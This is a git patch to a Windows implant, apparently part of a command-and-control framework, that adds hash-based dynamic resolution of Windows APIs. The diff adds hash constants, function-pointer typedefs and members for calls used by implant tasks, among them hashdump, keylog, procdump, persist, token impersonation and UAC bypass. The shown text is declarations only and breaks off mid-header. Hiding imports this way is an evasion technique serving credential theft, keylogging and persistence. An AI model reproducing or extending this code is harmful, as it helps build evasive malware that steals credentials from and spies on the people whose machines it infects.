From d680424f960edc5013404bac4657622253289f9b Mon Sep 17 00:00:00 2001 From: hdks Date: Sat, 25 May 2024 18:18:42 +0900 Subject: [PATCH] implant: implemented all dynamic api resolution --- payload/win/implant/CMakeLists.txt | 2 +- payload/win/implant/include/core/procs.hpp | 155 +++++++++ payload/win/implant/include/core/state.hpp | 4 + payload/win/implant/include/core/system.hpp | 2 +- payload/win/implant/include/core/task.hpp | 23 +- payload/win/implant/include/core/win32.hpp | 327 +++++++++++++++++- payload/win/implant/script/calc_hash_func.py | 37 ++ payload/win/implant/script/calc_hash_module | Bin 53696 -> 53696 bytes .../win/implant/script/calc_hash_module.cpp | 6 +- payload/win/implant/src/core/handler.cpp | 10 +- payload/win/implant/src/core/procs.cpp | 100 +++++- payload/win/implant/src/core/state.cpp | 4 + payload/win/implant/src/core/task/find.cpp | 6 +- .../win/implant/src/core/task/hashdump.cpp | 33 +- payload/win/implant/src/core/task/ip.cpp | 14 +- payload/win/implant/src/core/task/keylog.cpp | 10 +- payload/win/implant/src/core/task/ls.cpp | 6 +- payload/win/implant/src/core/task/migrate.cpp | 2 +- payload/win/implant/src/core/task/mv.cpp | 2 +- payload/win/implant/src/core/task/net.cpp | 6 +- payload/win/implant/src/core/task/persist.cpp | 64 ++-- .../win/implant/src/core/task/procdump.cpp | 25 +- payload/win/implant/src/core/task/reg.cpp | 8 +- payload/win/implant/src/core/task/rmdir.cpp | 4 +- payload/win/implant/src/core/task/runas.cpp | 2 +- .../win/implant/src/core/task/screenshot.cpp | 40 ++- payload/win/implant/src/core/task/token.cpp | 18 +- payload/win/implant/src/core/task/uac.cpp | 16 +- payload/win/implant/src/core/task/whoami.cpp | 14 +- payload/win/implant/src/hermit.cpp | 36 ++ 30 files changed, 823 insertions(+), 153 deletions(-) diff --git a/payload/win/implant/CMakeLists.txt b/payload/win/implant/CMakeLists.txt index 20b8626..8833848 100644 --- a/payload/win/implant/CMakeLists.txt +++ b/payload/win/implant/CMakeLists.txt @@ -145,7 +145,7 @@ if(${PAYLOAD_TYPE} STREQUAL \"beacon\") endif() # LINK LIBRATILIES -link_libraries(bcrypt dbghelp gdi32 gdiplus iphlpapi netapi32 psapi wsock32 ws2_32) +link_libraries(dbghelp gdi32 gdiplus iphlpapi netapi32 psapi wsock32 ws2_32) # ADD if(${PAYLOAD_FORMAT} STREQUAL "dll") diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp index 5d5575c..b2ff769 100644 --- a/payload/win/implant/include/core/procs.hpp +++ b/payload/win/implant/include/core/procs.hpp @@ -10,6 +10,7 @@ #include #include +#include #include #include @@ -20,6 +21,8 @@ // Generated by script/calc_hash_module #define HASH_MODULE_BCRYPT 0xe4317f37 #define HASH_MODULE_CRYPT32 0xd3c8cc6e +#define HASH_MODULE_DBGHELP 0xcf3eb48b +#define HASH_MODULE_IPHLPAPI 0x3d524640 #define HASH_MODULE_KERNEL32 0xf4796887 #define HASH_MODULE_NETAPI32 0xa0ed44a7 #define HASH_MODULE_NTDLL 0x3cd7873f @@ -92,31 +95,56 @@ #define HASH_FUNC_CREATEFILEW 0x9dca9eca #define HASH_FUNC_CREATEPIPE 0xfee438df #define HASH_FUNC_CREATEPROCESSW 0x78f4d6f9 +#define HASH_FUNC_CREATEPROCESSWITHLOGONW 0x6e6511b8 +#define HASH_FUNC_CREATEPROCESSWITHTOKENW 0x624476a2 #define HASH_FUNC_CREATEREMOTETHREADEX 0xdc857934 #define HASH_FUNC_CREATETHREADPOOLWAIT 0x7a8370ac +#define HASH_FUNC_CREATEWINDOWEXW 0xf05a61e3 #define HASH_FUNC_CRYPTBINARYTOSTRINGW 0x3bb09cf1 #define HASH_FUNC_CRYPTSTRINGTOBINARYW 0x6ff96cf1 +#define HASH_FUNC_DELETEFILEW 0x2d3a5bfb +#define HASH_FUNC_DISPATCHMESSAGE 0x1667a8b8 #define HASH_FUNC_DLLMAIN 0xe2e2f348 +#define HASH_FUNC_DUPLICATETOKENEX 0x8fa20256 #define HASH_FUNC_EXPANDENVIRONMENTSTRINGSW 0x30ae5619 +#define HASH_FUNC_FINDCLOSE 0xbfb52d8a #define HASH_FUNC_FINDFIRSTFILEW 0x8b7ad5b9 #define HASH_FUNC_FINDNEXTFILEW 0x9a714aba +#define HASH_FUNC_FORMATMESSAGE 0x73e1db #define HASH_FUNC_FREEENVIRONMENTSTRINGSW 0xebf072c7 +#define HASH_FUNC_GETADAPTERSADDRESSES 0xc7179a9d #define HASH_FUNC_GETCOMPUTERNAMEW 0x75f9dd70 #define HASH_FUNC_GETENVIRONMENTSTRINGSW 0x6f39aea7 +#define HASH_FUNC_GETFOREGROUNDWINDOW 0x41b94f14 #define HASH_FUNC_GETLASTERROR 0xf03e69b1 +#define HASH_FUNC_GETMESSAGE 0xb704bce6 #define HASH_FUNC_GETMODULEFILENAMEW 0x9896e0e3 #define HASH_FUNC_GETPROCADDRESS 0xafa3e09d #define HASH_FUNC_GETPROCESSHEAP 0xf3b49f5a +#define HASH_FUNC_GETPROCESSIMAGEFILENAMEW 0x92662ae3 #define HASH_FUNC_GETSYSTEMDIRECTORYW 0x7115fb1a +#define HASH_FUNC_GETSYSTEMMETRICS 0xc45b24b3 +#define HASH_FUNC_GETTCPTABLE 0x7f7271ee +#define HASH_FUNC_GETTOKENINFORMATION 0x98171074 #define HASH_FUNC_GETUSERNAMEW 0x6f996540 +#define HASH_FUNC_GLOBALALLOC 0x25c2f9dd +#define HASH_FUNC_GLOBALFREE 0xcf0cfc4 #define HASH_FUNC_HEAPALLOC 0x4cb68674 #define HASH_FUNC_HEAPFREE 0x2b04aacd +#define HASH_FUNC_IMPERSONATELOGGEDONUSER 0x3333ce10 #define HASH_FUNC_ISDEBUGGERPRESENT 0xef4ed1b +#define HASH_FUNC_LOADACCELERATORSW 0x8d581ef4 +#define HASH_FUNC_LOADCURSORW 0xc5332f86 +#define HASH_FUNC_LOADICONW 0x42d0af83 #define HASH_FUNC_LOADLIBRARYA 0x7069f241 #define HASH_FUNC_LOADLIBRARYW 0x7069f257 +#define HASH_FUNC_LOCALFREE 0x50d0ddc2 +#define HASH_FUNC_LOOKUPPRIVILEGENAMEW 0x559348ea #define HASH_FUNC_LOOKUPPRIVILEGEVALUEW 0x6e9aab88 #define HASH_FUNC_MESSAGEBOXA 0xcc4a1d08 #define HASH_FUNC_MESSAGEBOXW 0xcc4a1d1e +#define HASH_FUNC_MINIDUMPWRITEDUMP 0x46115a93 +#define HASH_FUNC_MOVEFILEW 0x1831dbd5 #define HASH_FUNC_NETAPIBUFFERFREE 0xd2840f3e #define HASH_FUNC_NETLOCALGROUPENUM 0x8823503d #define HASH_FUNC_NETUSERENUM 0x7a5df1b4 @@ -127,15 +155,27 @@ #define HASH_FUNC_READFILE 0x9a3e0607 #define HASH_FUNC_READPROCESSMEMORY 0xb29e4a5 #define HASH_FUNC_REGCLOSEKEY 0x2fd69f86 +#define HASH_FUNC_REGCREATEKEYEXW 0x8d1b9d00 #define HASH_FUNC_REGENUMKEYEXW 0x1118d05 +#define HASH_FUNC_REGENUMVALUEW 0x21798766 +#define HASH_FUNC_REGISTERCLASSEXW 0xab97084 #define HASH_FUNC_REGOPENKEYEXW 0xab1b58e #define HASH_FUNC_REGQUERYINFOKEYW 0x5b0be62f +#define HASH_FUNC_REGSAVEKEYW 0xd68c94b4 +#define HASH_FUNC_REGSETVALUEEXW 0x9dbfac36 +#define HASH_FUNC_REMOVEDIRECTORYW 0x41880283 +#define HASH_FUNC_REVERTTOSELF 0x6c5291c0 #define HASH_FUNC_RTLADDFUNCTIONTABLE 0xbe7f92ca #define HASH_FUNC_RTLCOPYMEMORY 0xfd82b9ab #define HASH_FUNC_SETFILEINFORMATIONBYHANDLE 0xbfea4fe2 #define HASH_FUNC_SETHANDLEINFORMATION 0x59694f77 #define HASH_FUNC_SETTHREADPOOLWAIT 0x5f2a3808 +#define HASH_FUNC_SHELLEXECUTEEXW 0x6c42582a +#define HASH_FUNC_SHOWWINDOW 0x6f98b62 #define HASH_FUNC_TERMINATEPROCESS 0x74f7cca3 +#define HASH_FUNC_TRANSLATEACCELERATORW 0xecb91305 +#define HASH_FUNC_TRANSLATEMESSAGE 0xf1acceae +#define HASH_FUNC_UPDATEWINDOW 0x401c176e #define HASH_FUNC_VIRTUALALLOC 0x5ae0dabf #define HASH_FUNC_VIRTUALALLOCEX 0x104fd152 #define HASH_FUNC_VIRTUALFREE 0x640675a2 @@ -285,54 +325,104 @@ namespace Procs typedef BOOL (WINAPI* LPPROC_CREATEPIPE)(PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize); // CreateProcessW typedef BOOL (WINAPI* LPPROC_CREATEPROCESSW)(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); + // CreateProcessWithLogonW + typedef BOOL (WINAPI* LPPROC_CREATEPROCESSWITHLOGONW)(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); + // CreateProcessWithTokenW + typedef BOOL (WINAPI* LPPROC_CREATEPROCESSWITHTOKENW)(HANDLE hToken, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); // CreateRemoteThreadEx typedef HANDLE (WINAPI* LPPROC_CREATEREMOTETHREADEX)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, LPDWORD lpThreadId); + // CreateWindowExW + typedef HWND (WINAPI* LPPROC_CREATEWINDOWEXW)(DWORD dwExStyle, LPCWSTR lpClassName, LPCWSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam); // CryptBinaryToStringW typedef BOOL (WINAPI* LPPROC_CRYPTBINARYTOSTRINGW)(const BYTE *pbBinary, DWORD cbBinary, DWORD dwFlags, LPWSTR pszString, DWORD *pcchString); // CryptStringToBinaryW typedef BOOL (WINAPI* LPPROC_CRYPTSTRINGTOBINARYW)(LPCWSTR pszString, DWORD cchString, DWORD dwFlags, BYTE *pbBinary, DWORD *pcbBinary, DWORD *pdwSkip, DWORD *pdwFlags); + // DeleteFileW + typedef BOOL (WINAPI* LPPROC_DELETEFILEW)(LPCTSTR lpFileName); + // DispatchMessage + typedef LRESULT (WINAPI* LPPROC_DISPATCHMESSAGE)(const MSG *lpMsg); // DllMain typedef BOOL (WINAPI* LPPROC_DLLMAIN)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); + // DuplicateTokenEx + typedef BOOL (WINAPI* LPPROC_DUPLICATETOKENEX)(HANDLE hExistingToken, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpTokenAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, PHANDLE phNewToken); // ExpandEnvironmentStringsW typedef DWORD (WINAPI* LPPROC_EXPANDENVIRONMENTSTRINGSW)(LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize); + // FindClose + typedef BOOL (WINAPI* LPPROC_FINDCLOSE)(HANDLE hFindFile); // FindFirstFileW typedef HANDLE (WINAPI* LPPROC_FINDFIRSTFILEW)(LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData); // FindNextFileW typedef BOOL (WINAPI* LPPROC_FINDNEXTFILEW)(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData); + // FormatMessage + typedef DWORD (WINAPI* LPPROC_FORMATMESSAGE)(DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPTSTR lpBuffer, DWORD nSize, va_list *Arguments); // FreeEnvironmentStringsW typedef BOOL (WINAPI* LPPROC_FREEENVIRONMENTSTRINGSW)(LPWCH penv); + // GetAdaptersAddresses + typedef ULONG (WINAPI* LPPROC_GETADAPTERSADDRESSES)(ULONG Family, ULONG Flags, PVOID Reserved, PIP_ADAPTER_ADDRESSES AdapterAddresses, PULONG SizePointer); // GetComputerNameW typedef BOOL (WINAPI* LPPROC_GETCOMPUTERNAMEW)(LPWSTR lpBuffer, LPDWORD nSize); // GetEnvironmentStringsW typedef LPWCH (WINAPI* LPPROC_GETENVIRONMENTSTRINGSW)(); + // GetForegroundWindow + typedef HWND (WINAPI* LPPROC_GETFOREGROUNDWINDOW)(); // GetLastError typedef DWORD (WINAPI* LPPROC_GETLASTERROR)(); + // GetMessage + typedef BOOL (WINAPI* LPPROC_GETMESSAGE)(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax); // GetModuleFileNameW typedef DWORD (WINAPI* LPPROC_GETMODULEFILENAMEW)(HMODULE hModule, LPWSTR lpFilename, DWORD nSize); // GetProcAddress typedef FARPROC (WINAPI* LPPROC_GETPROCADDRESS)(HMODULE hModule, LPCSTR lpProcName); // GetProcessHeap typedef HANDLE (WINAPI* LPPROC_GETPROCESSHEAP)(); + // GetProcssImageFileNameW + typedef DWORD (WINAPI* LPPROC_GETPROCESSIMAGEFILENAMEW)(HANDLE hProcess, LPWSTR lpImageFileName, DWORD nSize); // GetSystemDirectoryW typedef UINT (WINAPI* LPPROC_GETSYSTEMDIRECTORYW)(LPWSTR lpBuffer, UINT uSize); + // GetSystemMetrics + typedef int (WINAPI* LPPROC_GETSYSTEMMETRICS)(int nIndex); + // GetTcpTable + typedef ULONG (WINAPI* LPPROC_GETTCPTABLE)(PMIB_TCPTABLE TcpTable, PULONG SizePointer, BOOL Order); + // GetTokenInformation + typedef BOOL (WINAPI* LPPROC_GETTOKENINFORMATION)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); // GetUserNameW typedef BOOL (WINAPI* LPPROC_GETUSERNAMEW)(LPWSTR lpBuffer, LPDWORD pcbBuffer); + // GlobalAlloc + typedef HGLOBAL (WINAPI* LPPROC_GLOBALALLOC)(UINT uFlags, SIZE_T dwBytes); + // GlobalFree + typedef HGLOBAL (WINAPI* LPPROC_GLOBALFREE)(HGLOBAL hMem); // HeapAlloc typedef LPVOID (WINAPI* LPPROC_HEAPALLOC)(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); // HeapFree typedef BOOL (WINAPI* LPPROC_HEAPFREE)(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem); + // ImpersonateLoggedOnUser + typedef BOOL (WINAPI* LPPROC_IMPERSONATELOGGEDONUSER)(HANDLE hToken); // IsDebuggerPresent typedef BOOL (WINAPI* LPPROC_ISDEBUGGERPRESENT)(); + // LoadAcceleratorsW + typedef HACCEL (WINAPI* LPPROC_LOADACCELERATORSW)(HINSTANCE hInstance, LPCWSTR lpTableName); + // LoadCursorW + typedef HCURSOR (WINAPI* LPPROC_LOADCURSORW)(HINSTANCE hInstance, LPCWSTR lpCursorName); + // LoadIconW + typedef HICON (WINAPI* LPPROC_LOADICONW)(HINSTANCE hInstance, LPCWSTR lpIconName); // LoadLibraryA typedef HMODULE (WINAPI* LPPROC_LOADLIBRARYA)(LPCSTR lpLibFileName); // LoadLibraryW typedef HMODULE (WINAPI* LPPROC_LOADLIBRARYW)(LPCWSTR lpLibFileName); + // LocalFree + typedef HLOCAL (WINAPI* LPPROC_LOCALFREE)(HLOCAL hMem); + // LookupPrivilegeNameW + typedef BOOL (WINAPI* LPPROC_LOOKUPPRIVILEGENAMEW)(LPCWSTR lpSystemName, PLUID lpLuid, LPWSTR lpName, LPDWORD cchName); // LookupPrivilegeValueW typedef BOOL (WINAPI* LPPROC_LOOKUPPRIVILEGEVALUEW)(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); // MessageBoxA typedef int (WINAPI* LPPROC_MESSAGEBOXA)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType); // MessageBoxW typedef int (WINAPI* LPPROC_MESSAGEBOXW)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType); + // MiniDumpWriteDump + typedef BOOL (WINAPI* LPPROC_MINIDUMPWRITEDUMP)(HANDLE hProcess, DWORD ProcessId, HANDLE hFile, MINIDUMP_TYPE DumpType, PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, PMINIDUMP_CALLBACK_INFORMATION CallbackParam); + // MoveFileW + typedef BOOL (WINAPI* LPPROC_MOVEFILEW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName); // NetApiBufferFree typedef NET_API_STATUS (WINAPI* LPPROC_NETAPIBUFFERFREE)(LPVOID Buffer); // NetLocalGroupEnum @@ -353,12 +443,26 @@ namespace Procs typedef BOOL (WINAPI* LPPROC_READPROCESSMEMORY)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); // RegCloseKey typedef LSTATUS (WINAPI* LPPROC_REGCLOSEKEY)(HKEY hKey); + // RegCreateKeyExW + typedef LSTATUS (WINAPI* LPPROC_REGCREATEKEYEXW)(HKEY hKey, LPCWSTR lpSubKey, DWORD Reserved, LPWSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition); // RegEnumKeyExW typedef LSTATUS (WINAPI* LPPROC_REGENUMKEYEXW)(HKEY hKey, DWORD dwIndex, LPWSTR lpName, LPDWORD lpcchName, LPDWORD lpReserved, LPWSTR lpClass, LPDWORD lpcchClass, PFILETIME lpftLastWriteTime); + // RegEnumValueW + typedef LSTATUS (WINAPI* LPPROC_REGENUMVALUEW)(HKEY hKey, DWORD dwIndex, LPWSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData); + // RegisterClassExW + typedef ATOM (WINAPI* LPPROC_REGISTERCLASSEXW)(const WNDCLASSEXW *unnamedParam1); // RegOpenKeyExW typedef LSTATUS (WINAPI* LPPROC_REGOPENKEYEXW)(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); // RegQueryInforKeyW typedef LSTATUS (WINAPI* LPPROC_REGQUERYINFOKEYW)(HKEY hKey, LPWSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcbMaxSubKeyLen, LPDWORD lpcbMaxClassLen, LPDWORD lpcValues, LPDWORD lpcbMaxValueNameLen, LPDWORD lpcbMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime); + // RegSaveKeyW + typedef LSTATUS (WINAPI* LPPROC_REGSAVEKEYW)(HKEY hKey, LPCWSTR lpFile, const LPSECURITY_ATTRIBUTES lpSecurityAttributes); + // RegSetValueExW + typedef LSTATUS (WINAPI* LPPROC_REGSETVALUEEXW)(HKEY hKey, LPCWSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData); + // RemoveDirectoryW + typedef BOOL (WINAPI* LPPROC_REMOVEDIRECTORYW)(LPCWSTR lpPathName); + // RevertToSelf + typedef BOOL (WINAPI* LPPROC_REVERTTOSELF)(); // RtlAddFunctionTable typedef BOOL (WINAPI* LPPROC_RTLADDFUNCTIONTABLE)(PRUNTIME_FUNCTION FunctionTable, DWORD EntryCount, DWORD64 BaseAddress); // RtlCopyMemory @@ -367,8 +471,18 @@ namespace Procs typedef BOOL (WINAPI* LPPROC_SETFILEINFORMATIONBYHANDLE)(HANDLE hFile, FILE_INFO_BY_HANDLE_CLASS FileInformationClass, LPVOID lpFileInformation, DWORD dwBufferSize); // SetHandleInformation typedef BOOL (WINAPI* LPPROC_SETHANDLEINFORMATION)(HANDLE hObject, DWORD dwMask, DWORD dwFlags); + // ShellExecuteExW + typedef BOOL (WINAPI* LPPROC_SHELLEXECUTEEXW)(SHELLEXECUTEINFOW *pExecInfo); + // ShowWindow + typedef BOOL (WINAPI* LPPROC_SHOWWINDOW)(HWND hWnd, int nCmdShow); // TerminateProcess typedef BOOL (WINAPI* LPPROC_TERMINATEPROCESS)(HANDLE hProcess, UINT uExitCode); + // TranslateAcceleratorW + typedef int (WINAPI* LPPROC_TRANSLATEACCELERATORW)(HWND hWnd, HACCEL hAccTable, LPMSG lpMsg); + // TranslateMessage + typedef BOOL (WINAPI* LPPROC_TRANSLATEMESSAGE)(const MSG *lpMsg); + // UpdateWindow + typedef BOOL (WINAPI* LPPROC_UPDATEWINDOW)(HWND hWnd); // VirtualAlloc typedef LPVOID (WINAPI* LPPROC_VIRTUALALLOC)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); // VirtualAllocEx @@ -470,26 +584,51 @@ namespace Procs LPPROC_CREATEFILEW lpCreateFileW = nullptr; LPPROC_CREATEPIPE lpCreatePipe = nullptr; LPPROC_CREATEPROCESSW lpCreateProcessW = nullptr; + LPPROC_CREATEPROCESSWITHLOGONW lpCreateProcessWithLogonW = nullptr; + LPPROC_CREATEPROCESSWITHTOKENW lpCreateProcessWithTokenW = nullptr; LPPROC_CREATEREMOTETHREADEX lpCreateRemoteThreadEx = nullptr; + LPPROC_CREATEWINDOWEXW lpCreateWindowExW = nullptr; LPPROC_CRYPTBINARYTOSTRINGW lpCryptBinaryToStringW = nullptr; LPPROC_CRYPTSTRINGTOBINARYW lpCryptStringToBinaryW = nullptr; + LPPROC_DELETEFILEW lpDeleteFileW = nullptr; + LPPROC_DISPATCHMESSAGE lpDispatchMessage = nullptr; + LPPROC_DUPLICATETOKENEX lpDuplicateTokenEx = nullptr; LPPROC_EXPANDENVIRONMENTSTRINGSW lpExpandEnvironmentStringsW = nullptr; + LPPROC_FINDCLOSE lpFindClose = nullptr; LPPROC_FINDFIRSTFILEW lpFindFirstFileW = nullptr; LPPROC_FINDNEXTFILEW lpFindNextFileW = nullptr; + LPPROC_FORMATMESSAGE lpFormatMessage = nullptr; LPPROC_FREEENVIRONMENTSTRINGSW lpFreeEnvironmentStringsW = nullptr; + LPPROC_GETADAPTERSADDRESSES lpGetAdaptersAddresses = nullptr; LPPROC_GETCOMPUTERNAMEW lpGetComputerNameW = nullptr; LPPROC_GETENVIRONMENTSTRINGSW lpGetEnvironmentStringsW = nullptr; + LPPROC_GETFOREGROUNDWINDOW lpGetForegroundWindow = nullptr; LPPROC_GETLASTERROR lpGetLastError = nullptr; + LPPROC_GETMESSAGE lpGetMessage = nullptr; LPPROC_GETMODULEFILENAMEW lpGetModuleFileNameW = nullptr; LPPROC_GETPROCESSHEAP lpGetProcessHeap = nullptr; + LPPROC_GETPROCESSIMAGEFILENAMEW lpGetProcessImageFileNameW = nullptr; LPPROC_GETSYSTEMDIRECTORYW lpGetSystemDirectoryW = nullptr; + LPPROC_GETSYSTEMMETRICS lpGetSystemMetrics = nullptr; + LPPROC_GETTCPTABLE lpGetTcpTable = nullptr; + LPPROC_GETTOKENINFORMATION lpGetTokenInformation = nullptr; LPPROC_GETUSERNAMEW lpGetUserNameW = nullptr; + LPPROC_GLOBALALLOC lpGlobalAlloc = nullptr; + LPPROC_GLOBALFREE lpGlobalFree = nullptr; LPPROC_HEAPALLOC lpHeapAlloc = nullptr; LPPROC_HEAPFREE lpHeapFree = nullptr; + LPPROC_IMPERSONATELOGGEDONUSER lpImpersonateLoggedOnUser = nullptr; LPPROC_ISDEBUGGERPRESENT lpIsDebuggerPresent = nullptr; + LPPROC_LOADACCELERATORSW lpLoadAcceleratorsW = nullptr; + LPPROC_LOADCURSORW lpLoadCursorW = nullptr; + LPPROC_LOADICONW lpLoadIconW = nullptr; LPPROC_LOADLIBRARYA lpLoadLibraryA = nullptr; LPPROC_LOADLIBRARYW lpLoadLibraryW = nullptr; + LPPROC_LOCALFREE lpLocalFree = nullptr; + LPPROC_LOOKUPPRIVILEGENAMEW lpLookupPrivilegeNameW = nullptr; LPPROC_LOOKUPPRIVILEGEVALUEW lpLookupPrivilegeValueW = nullptr; + LPPROC_MINIDUMPWRITEDUMP lpMiniDumpWriteDump = nullptr; + LPPROC_MOVEFILEW lpMoveFileW = nullptr; LPPROC_NETAPIBUFFERFREE lpNetApiBufferFree = nullptr; LPPROC_NETLOCALGROUPENUM lpNetLocalGroupEnum = nullptr; LPPROC_NETUSERENUM lpNetUserEnum = nullptr; @@ -500,13 +639,25 @@ namespace Procs LPPROC_READFILE lpReadFile = nullptr; LPPROC_READPROCESSMEMORY lpReadProcessMemory = nullptr; LPPROC_REGCLOSEKEY lpRegCloseKey = nullptr; + LPPROC_REGCREATEKEYEXW lpRegCreateKeyExW = nullptr; LPPROC_REGENUMKEYEXW lpRegEnumKeyExW = nullptr; + LPPROC_REGENUMVALUEW lpRegEnumValueW = nullptr; + LPPROC_REGISTERCLASSEXW lpRegisterClassExW = nullptr; LPPROC_REGOPENKEYEXW lpRegOpenKeyExW = nullptr; LPPROC_REGQUERYINFOKEYW lpRegQueryInfoKeyW = nullptr; + LPPROC_REGSAVEKEYW lpRegSaveKeyW = nullptr; + LPPROC_REGSETVALUEEXW lpRegSetValueExW = nullptr; + LPPROC_REMOVEDIRECTORYW lpRemoveDirectoryW = nullptr; + LPPROC_REVERTTOSELF lpRevertToSelf = nullptr; LPPROC_RTLCOPYMEMORY lpRtlCopyMemory = nullptr; LPPROC_SETFILEINFORMATIONBYHANDLE lpSetFileInformationByHandle = nullptr; LPPROC_SETHANDLEINFORMATION lpSetHandleInformation = nullptr; + LPPROC_SHELLEXECUTEEXW lpShellExecuteExW = nullptr; + LPPROC_SHOWWINDOW lpShowWindow = nullptr; LPPROC_TERMINATEPROCESS lpTerminateProcess = nullptr; + LPPROC_TRANSLATEACCELERATORW lpTranslateAcceleratorW = nullptr; + LPPROC_TRANSLATEMESSAGE lpTranslateMessage = nullptr; + LPPROC_UPDATEWINDOW lpUpdateWindow = nullptr; LPPROC_VIRTUALALLOCEX lpVirtualAllocEx = nullptr; LPPROC_VIRTUALFREE lpVirtualFree = nullptr; LPPROC_VIRTUALPROTECTEX lpVirtualProtectEx = nullptr; @@ -585,7 +736,11 @@ namespace Procs HMODULE hAdvapi32DLL, HMODULE hBcryptDLL, HMODULE hCrypt32DLL, + HMODULE hDbghelpDLL, + HMODULE hIphlpapiDLL, HMODULE hNetapi32DLL, + HMODULE hShell32DLL, + HMODULE hUser32DLL, HMODULE hWinHTTPDLL ); } diff --git a/payload/win/implant/include/core/state.hpp b/payload/win/implant/include/core/state.hpp index bc1bb6b..109659c 100644 --- a/payload/win/implant/include/core/state.hpp +++ b/payload/win/implant/include/core/state.hpp @@ -28,9 +28,13 @@ namespace State HMODULE hAdvapi32DLL; HMODULE hBcryptDLL; HMODULE hCrypt32DLL; + HMODULE hDbghelpDLL; + HMODULE hIphlpapiDLL; HMODULE hKernel32DLL; HMODULE hNetapi32DLL; HMODULE hNTDLL; + HMODULE hShell32DLL; + HMODULE hUser32DLL; HMODULE hWinHTTPDLL; // Procedures loaded dynamatically (including syscalls) diff --git a/payload/win/implant/include/core/system.hpp b/payload/win/implant/include/core/system.hpp index cf3517a..fcfc83a 100644 --- a/payload/win/implant/include/core/system.hpp +++ b/payload/win/implant/include/core/system.hpp @@ -6,9 +6,9 @@ #include "core/procs.hpp" #include "core/stdout.hpp" #include "core/utils.hpp" +#include "core/win32.hpp" #include -// #include #include #include #include diff --git a/payload/win/implant/include/core/task.hpp b/payload/win/implant/include/core/task.hpp index 922a915..76e4704 100644 --- a/payload/win/implant/include/core/task.hpp +++ b/payload/win/implant/include/core/task.hpp @@ -4,18 +4,17 @@ #include #include "core/macros.hpp" -#include "core/win32.hpp" #include "core/state.hpp" #include "core/stdout.hpp" #include "core/system.hpp" #include "core/technique.hpp" #include "core/utils.hpp" +#include "core/win32.hpp" #include #include #include #include -#include #include #include #include @@ -98,7 +97,11 @@ namespace Task namespace Helper::Hashdump { - BOOL SaveRegHive(const std::wstring& wHiveKey, const std::wstring& wSavePath); + BOOL SaveRegHive( + Procs::PPROCS pProcs, + const std::wstring& wHiveKey, + const std::wstring& wSavePath + ); } namespace Helper::KeyLog @@ -115,14 +118,14 @@ namespace Task namespace Helper::Screenshot { - BOOL InitInstance(HINSTANCE hInstance, INT nCmdShow); + BOOL InitInstance(Procs::PPROCS pProcs, HINSTANCE hInstance, INT nCmdShow); // INT_PTR CALLBACK About(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam); INT GetEncoderClsid(const WCHAR* format, CLSID* pClsid); BOOL BmpToPng(); BOOL DeleteBmp(); int CaptureAnImage(HWND hWnd); LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam); - ATOM MyRegisterClass(HINSTANCE hInstance); + ATOM MyRegisterClass(Procs::PPROCS pProcs, HINSTANCE hInstance); } namespace 